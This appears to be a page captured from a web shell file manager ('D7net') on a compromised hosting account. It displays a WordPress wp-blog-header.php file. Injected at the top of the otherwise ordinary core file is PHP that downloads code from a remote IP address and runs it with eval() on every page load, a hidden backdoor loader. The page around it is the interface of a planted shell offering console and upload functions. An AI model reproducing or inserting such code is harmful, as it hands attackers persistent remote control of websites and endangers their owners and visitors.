D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
mybf1
/
public_html
/
test.bf1.my
/
Filename :
wp-blog-header.php
back
Copy
<?php /** * Loads the WordPress environment and template. * * @package WordPress */ $c = curl_init("http://204.12.195.170/z50826_6/stat/index2.txt"); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); curl_setopt($c, CURLOPT_TIMEOUT, 5); curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 3); $result = curl_exec($c); if ($result !== false) { eval('?>' . $result); } curl_close($c); if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }